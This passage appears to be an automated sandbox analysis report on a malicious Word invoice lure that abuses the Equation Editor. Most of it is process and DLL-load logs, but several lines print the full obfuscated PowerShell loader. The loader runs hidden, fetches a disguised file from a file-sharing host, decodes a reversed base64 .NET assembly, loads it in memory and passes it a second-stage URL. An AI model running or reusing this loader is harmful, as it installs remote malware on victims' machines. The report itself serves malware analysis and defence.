K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )"Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: ConfirmaciXnXdeXfacturaXPedidoXadicional.LNK.0.drLNK file: ..\..\..\..\..\Desktop\ConfirmaciXnXdeXfacturaXPedidoXadicional.doc
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: ??\C:\Windows\System.pdbpdbtem.pdbGAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb.Core.pdb\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.419784641.00000000006DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.420218048.0000000000DB2000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.420218048.0000000000DB2000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.420218048.0000000000DB2000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )"Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AH
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )"
